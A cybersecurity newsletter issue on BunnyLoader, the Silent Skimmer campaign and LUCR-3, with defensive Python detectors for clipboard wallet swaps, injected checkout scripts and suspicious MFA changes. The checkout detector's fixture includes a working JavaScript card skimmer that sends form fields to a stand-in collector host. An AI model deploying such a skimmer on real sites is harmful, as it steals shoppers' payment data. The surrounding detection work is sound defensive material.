Oct 03 2023
Welcome to Gone Phishing, your daily cybersecurity newsletter that’s shone a light on cybercrime #HS2 many times, too many times blud
Today’s hottest cybersecurity news stories:
BunnyLoader: No MaaS, por favor! Malware-as-a-Service appears
Bim bimmer who’s got the keys to my Silent Skimmer. Watch out!
Don’t SaaS me! LUCR-3: Scattered Spider spinning webs in the cloud ☁️
Hey there, cyber warriors! Brace yourselves for a new malware-as-a-service (MaaS) threat on the cybercrime scene. It’s called BunnyLoader, and it’s causing quite a buzz among cyber experts.
What’s BunnyLoader?
BunnyLoader is a sneaky piece of software that can do some nasty things. It can download and execute second-stage payloads, steal your browser credentials and system info, run remote commands on your computer, capture keystrokes, and even watch your clipboard so it can swap in the attacker’s cryptocurrency wallet address when you copy your own!
Price Tag: $250 for a Lifetime Licence
For just $250, you can get BunnyLoader’s lifetime licence. It’s been evolving since its debut on September 4, 2023, with new tricks up its sleeve, including anti-sandbox and antivirus evasion techniques.
What’s New in the Updates?
Recent updates fixed critical issues like command-and-control problems and SQL injection flaws in the malware’s own C2 panel. BunnyLoader’s author, PLAYER_BUNNY (aka PLAYER_BL), boasts about its fileless loading feature that gives antivirus programs a run for their money.
BunnyLoader’s Features:
Monitors active tasks
Tracks infection stats
Controls compromised machines
Steals data like a pro
How Does It Spread?
We’re not entirely sure how BunnyLoader spreads initially, but once it’s in, it plays dirty. It persists via the Windows Registry, checks for sandboxes, and gets to work. It can download more malware, snoop on your keystrokes, and redirect cryptocurrency payments by swapping the wallet address sitting in your clipboard!
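That clipboard trick leaves a tell an endpoint agent can catch: a clipper overwrites a copied wallet address with the operator’s address within a fraction of a second, so two different addresses of the same coin type landing in the clipboard almost back to back is not something a human does. The Python below is an added example written for this issue, not BunnyLoader’s code or tooling from any vendor report. The clipboard history, every wallet address in it and the address regexes are constructed for the demo.

```python
import re
from datetime import datetime, timedelta

# Wallet formats a clipper typically targets. The regexes are an assumption
# for this example (Bitcoin base58 legacy/P2SH, Bitcoin bech32, 0x Ethereum),
# not patterns taken from BunnyLoader.
WALLET_PATTERNS = {
    "btc": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{39,59})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}

# Constructed addresses used only by the sample clipboard history below.
USER_BTC = "1UserWa11etAddrForDemoPurposesXYZ"
USER_BTC_2 = "1AnotherUserWa11etForTheDemoABC"
ATTACKER_BTC = "1AttackerSwapTestAddr4ExampXYZabc"
USER_ETH = "0x" + "ab" * 20
ATTACKER_ETH = "0x" + "cd" * 20


def classify(text):
    """Return 'btc'/'eth' if text looks like a wallet address, else None."""
    text = text.strip()
    for coin, pattern in WALLET_PATTERNS.items():
        if pattern.match(text):
            return coin
    return None


def detect_clipper_swaps(events, window=timedelta(seconds=2)):
    """events: chronological list of (timestamp, clipboard_text).

    Flags a swap when one wallet address is overwritten by a *different*
    address of the same coin type within `window`. A person copying a second
    address takes seconds; a clipper reacts in milliseconds.
    Returns a list of (original, replacement, coin)."""
    swaps = []
    for (t_prev, prev), (t_cur, cur) in zip(events, events[1:]):
        coin = classify(prev)
        if (coin and coin == classify(cur) and prev.strip() != cur.strip()
                and t_cur - t_prev <= window):
            swaps.append((prev.strip(), cur.strip(), coin))
    return swaps


def repeated_replacements(swaps):
    """A clipper keeps substituting the same destination, so a replacement
    address seen more than once is almost certainly the operator's wallet."""
    counts = {}
    for _, replacement, _ in swaps:
        counts[replacement] = counts.get(replacement, 0) + 1
    return {addr for addr, n in counts.items() if n > 1}


def sample_events():
    """Constructed clipboard history (not real telemetry) containing three swaps."""
    t0 = datetime(2023, 10, 3, 9, 0, 0)

    def at(seconds):
        return t0 + timedelta(seconds=seconds)

    return [
        (at(0), "meeting notes for thursday"),
        (at(30.0), USER_BTC),        # user copies their own address
        (at(30.4), ATTACKER_BTC),    # clipper swaps it 400 ms later
        (at(120.0), USER_ETH),
        (at(120.3), ATTACKER_ETH),
        (at(600.0), USER_BTC_2),     # previous entry is ETH: coin type differs, not a swap
        (at(600.5), ATTACKER_BTC),   # same attacker address again
        (at(900.0), "https://example.invalid/invoice/42"),
    ]


if __name__ == "__main__":
    found = detect_clipper_swaps(sample_events())
    for original, replacement, coin in found:
        print(f"[{coin}] {original} -> {replacement}")
    print("likely clipper wallet(s):", repeated_replacements(found))
```

On a real host you would feed `detect_clipper_swaps` from whatever clipboard-change telemetry your EDR exposes; the two-second window is the knob to tune, and the repeated replacement address is what you block at the payment rail.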
Malware-as-a-Service Threat
BunnyLoader is a constantly evolving threat. Experts warn it’s getting smarter with each update, making it harder to detect.
Stay vigilant, folks! Make sure your cybersecurity defences are up to date to fend off this fluffy but dangerous BunnyLoader and other lurking threats in the digital wilderness.
Cybersecurity is more important than ever, and your Mac or PC is no exception. Over time, your Mac or PC can accumulate junk files, malware, and other threats that can slow it down and make it vulnerable to attack.
That’s where MacPaw comes in. MacPaw offers a suite of easy-to-use apps that can help you clean, optimize, and secure your Mac. With MacPaw, you can:
Remove junk files and malware to free up space and improve performance
Protect your privacy by erasing sensitive data
Optimize your startup settings to speed up boot times
Manage your extensions and apps to keep your Mac or PC running smoothly
Since 2008, MacPaw has been trusted by over 30 million users worldwide, and it’s the perfect solution for keeping your Mac or PC safe and secure.
Hey, vigilant netizens! Keep your wallets safe because a financial cyber campaign called Silent Skimmer has been quietly targeting online payment businesses across Asia Pacific, North America, and Latin America for over a year.
Who’s Behind It?
The BlackBerry Research and Intelligence Team is on the case, tracing this threat back to a skilled actor fluent in Chinese. They’ve been going after online businesses and point-of-sale (PoS) service providers.
How Do They Operate?
These cybercriminals exploit vulnerabilities in web applications, especially those hosted on Internet Information Services (IIS). Their main goal? To compromise payment checkout pages and steal your sensitive payment data.
The Attack Chain:
Once they sneak in, they use open-source tools and clever techniques for privilege escalation and code execution. This leads to a PowerShell-based remote access trojan that lets them control the host. It connects to a remote server for more tools, like download scripts and Cobalt Strike beacons.
What’s the Endgame?
Their ultimate aim is to infiltrate web servers and drop a scraper in the payment checkout service. This sneaky tool quietly snatches your financial info while you innocently enter it on a webpage.
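The scraper stage is the one a merchant can watch for directly: to lift card data from the browser, the skimmer has to get its own JavaScript onto the checkout page, either as a new inline block or as a new external script. The Python below is an added example written for this issue, not tooling from BlackBerry or from the Silent Skimmer actor. It builds a script inventory of a known-good checkout page and diffs the live copy against it; the baseline page, the injected skimmer snippet and the collector domain are all constructed for the demo.

```python
import hashlib
from html.parser import HTMLParser


class ScriptInventory(HTMLParser):
    """Collects every <script> on a page: external ones by their src,
    inline ones by the SHA-256 of their body."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self._in_inline = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.add(hashlib.sha256(body.encode()).hexdigest())


def inventory(html):
    parser = ScriptInventory()
    parser.feed(html)
    parser.close()
    return parser.external, parser.inline


def diff_scripts(baseline_html, live_html):
    """Compare the live checkout page against the signed-off baseline.
    Anything under new_external / new_inline was not there at sign-off
    and needs a human to look at it before the next transaction."""
    base_ext, base_inline = inventory(baseline_html)
    live_ext, live_inline = inventory(live_html)
    return {
        "new_external": sorted(live_ext - base_ext),
        "removed_external": sorted(base_ext - live_ext),
        "new_inline": sorted(live_inline - base_inline),
        "removed_inline": sorted(base_inline - live_inline),
    }


# Constructed known-good checkout page (not a real merchant page).
BASELINE = """<html><body>
<form id="checkout" action="/pay" method="post">
  <input name="card"><input name="expiry"><input name="cvv">
</form>
<script src="/static/checkout.js"></script>
<script>window.__cfg = {currency: "USD"};</script>
</body></html>"""

# Constructed skimmer: on submit, copy every field and beacon it to a
# collector on a domain reserved for examples.
SKIMMER = """<script>
document.getElementById("checkout").addEventListener("submit", function () {
  var d = {};
  document.querySelectorAll("#checkout input").forEach(function (i) { d[i.name] = i.value; });
  new Image().src = "https://collector.example.invalid/c?d=" + btoa(JSON.stringify(d));
});
</script>"""

# The same page after compromise: one new inline block, one new external script.
COMPROMISED = BASELINE.replace(
    "</body>",
    SKIMMER + '\n<script src="https://cdn.example.invalid/analytics.js"></script>\n</body>',
)


if __name__ == "__main__":
    for key, items in diff_scripts(BASELINE, COMPROMISED).items():
        print(key, items)
```

Run it from a scheduled job that fetches the live checkout page over the public internet (not from the server’s own filesystem, since this actor controls the server) and page any non-empty `new_*` list. Hashing inline bodies rather than storing them keeps the baseline small and still catches a one-character change.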
Geolocation Trickery
These cyber crooks choose virtual private servers (VPS) based on their victims’ locations to dodge detection.
Opportunistic Approach
Silent Skimmer goes after various industries and regions, suggesting it’s more about seizing opportunities than having a specific plan.
Stay alert, and make sure you’re practising safe online shopping. These cyber threats are lurking everywhere!
In other news, watch out for scams on dating apps like MeetMe, where crooks are making millions with fake cryptocurrency schemes. Be cautious and stay safe online!
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
HealthHack: Tech is making it easier than ever to reach your fitness goals, from wearable devices to nutrition apps. This newsletter does the research for you and delivers all the latest health tech gadgets to your inbox.
₿ Crypto Nutshell: A well-written and beautifully designed newsletter giving you the lowdown on crypto and web3. Highly recommended if you want up-to-date info on the crypto/web3 market.
Big Brain: Trending AI news, jobs and tools delivered in 3 minutes per day.
Let us know what you think!
Heads up, folks! There’s a new financially motivated attacker on the block, and it goes by the name LUCR-3. This cybercriminal is skilled and has been targeting Fortune 2000 companies across sectors like Software, Retail, Hospitality, Manufacturing, and Telecoms.
How LUCR-3 Operates
LUCR-3 doesn’t rely heavily on malware or scripts. Instead, it’s a pro at using your own tools and resources against you. It sneaks into your systems through Identity Providers (IdPs) like Okta, Azure AD, and Ping Identity, aiming to steal Intellectual Property (IP) for extortion.
They don’t just stop there; they also target your SaaS applications, learning how your organisation works and snatching sensitive data, including IP, Code Signing Certificates, and customer data.
Attribution Challenge
Identifying LUCR-3 isn’t easy. The cyber intelligence community has been tracking various personas linked to it. Some even seem to have connections to the BlackCat (ALPHV) ransomware.
⚔️ Weapon of Choice
LUCR-3 uses web browsers and GUI utilities for its mission, especially in Cloud, SaaS, and CI/CD environments. It operates like a savvy employee, making it hard to detect.
LUCR-3’s Mission
Financial gain is the name of the game for LUCR-3. They steal sensitive data like IP and customer info to attempt extortion, often demanding millions of dollars. Some LUCR-3 personas even team up with ALPHV for the extortion phase.
Toolset
LUCR-3 prefers Windows 10 systems with GUI utilities. In AWS, they leverage the S3 Browser and AWS CloudShell. They’re pros at using APIs, access tokens, and more to navigate your systems without raising alarms.
Victimology
LUCR-3 often targets big organisations with valuable IP, especially software companies. They also go after Identity Providers and their outsourced services. Recently, they’ve expanded their scope to include sectors like hospitality, gaming, and retail.
Attack Lifecycle
LUCR-3 does its homework, carefully choosing victims with the right access. They gain initial access through compromised credentials, bypass MFA, and modify MFA settings (for example, enrolling a factor they control so the stolen login keeps working). Then they map out your environment, escalate privileges if needed, and establish persistence. The goal is to maintain their presence and evade detection through various defence evasion tactics. Finally, they complete their mission by stealing sensitive data.
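That credentials-then-MFA sequence is the one to hunt for in your identity provider logs: a login from an address the user has never used, followed minutes later by an MFA factor change, is the attacker making sure the stolen session survives. The Python below is an added example written for this issue, not code from any vendor report or from LUCR-3 itself. The events are constructed and use Okta System Log field names (eventType, actor.alternateId, client.ipAddress, published) as an assumption; the per-user IP baseline is made up; and the CloudTrail records at the end assume that S3 Browser names itself in the userAgent field.

```python
from datetime import datetime, timedelta

# MFA-related event types to watch. Names follow Okta's System Log naming
# as an assumption for this example; map them for Azure AD / Ping.
MFA_CHANGE_EVENTS = {
    "user.mfa.factor.activate",
    "user.mfa.factor.update",
    "user.mfa.factor.deactivate",
}


def parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def find_suspicious_mfa_changes(events, known_ips, window=timedelta(minutes=30)):
    """Alert when a user's MFA factor changes within `window` of a session
    start for that user from an IP outside their baseline.

    events: IdP log records (dicts); known_ips: {user: set(ip)} built from
    the user's login history before the period under review."""
    recent_logins = {}  # user -> list of (timestamp, ip)
    alerts = []
    for ev in sorted(events, key=lambda e: e["published"]):
        user = ev["actor"]["alternateId"]
        ip = ev["client"]["ipAddress"]
        ts = parse_ts(ev["published"])
        if ev["eventType"] == "user.session.start":
            recent_logins.setdefault(user, []).append((ts, ip))
        elif ev["eventType"] in MFA_CHANGE_EVENTS:
            for login_ts, login_ip in recent_logins.get(user, []):
                if ts - login_ts <= window and login_ip not in known_ips.get(user, set()):
                    alerts.append({
                        "user": user,
                        "login_ip": login_ip,
                        "login_at": login_ts,
                        "mfa_event": ev["eventType"],
                        "mfa_at": ts,
                    })
                    break
    return alerts


def gui_tool_sessions(cloudtrail_records, markers=("S3 Browser",)):
    """Pull CloudTrail records whose userAgent names a desktop GUI client.
    Assumes S3 Browser puts its product name in the user agent string."""
    return [
        r for r in cloudtrail_records
        if any(m.lower() in r.get("userAgent", "").lower() for m in markers)
    ]


# Constructed IdP events (not real telemetry).
SAMPLE_IDP_EVENTS = [
    {"published": "2023-10-03T08:02:11Z", "eventType": "user.session.start",
     "actor": {"alternateId": "dev@example.invalid"}, "client": {"ipAddress": "203.0.113.10"}},
    {"published": "2023-10-03T08:05:40Z", "eventType": "user.mfa.factor.activate",
     "actor": {"alternateId": "dev@example.invalid"}, "client": {"ipAddress": "203.0.113.10"}},
    {"published": "2023-10-03T09:15:00Z", "eventType": "user.session.start",
     "actor": {"alternateId": "ops@example.invalid"}, "client": {"ipAddress": "198.51.100.7"}},
    {"published": "2023-10-03T13:40:22Z", "eventType": "user.mfa.factor.activate",
     "actor": {"alternateId": "ops@example.invalid"}, "client": {"ipAddress": "198.51.100.7"}},
]

# Constructed 30-day baseline of source IPs per user.
KNOWN_IPS = {
    "dev@example.invalid": {"192.0.2.5"},
    "ops@example.invalid": {"198.51.100.7"},
}

# Constructed CloudTrail records.
SAMPLE_CLOUDTRAIL = [
    {"eventTime": "2023-10-03T10:01:02Z", "eventName": "ListBuckets",
     "userAgent": "S3 Browser 11.0.9", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"}},
    {"eventTime": "2023-10-03T10:02:30Z", "eventName": "GetObject",
     "userAgent": "aws-cli/2.13.0", "userIdentity": {"arn": "arn:aws:iam::123456789012:role/ci"}},
]


if __name__ == "__main__":
    for alert in find_suspicious_mfa_changes(SAMPLE_IDP_EVENTS, KNOWN_IPS):
        print("MFA change after login from new IP:", alert)
    for rec in gui_tool_sessions(SAMPLE_CLOUDTRAIL):
        print("GUI client in CloudTrail:", rec["eventName"], rec["userAgent"])
```

The ops user enrols a factor too, but hours after a login from an address they always use, so only the dev account fires. Build `known_ips` from a month of session starts per user, and treat a hit as a reason to terminate sessions and re-verify the user out of band rather than as a low-priority ticket.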
Stay vigilant, strengthen your defences, and be cautious of suspicious activity, especially in your cloud and SaaS environments. Cyber threats like LUCR-3 are always on the prowl.
So long and thanks for reading all the phish!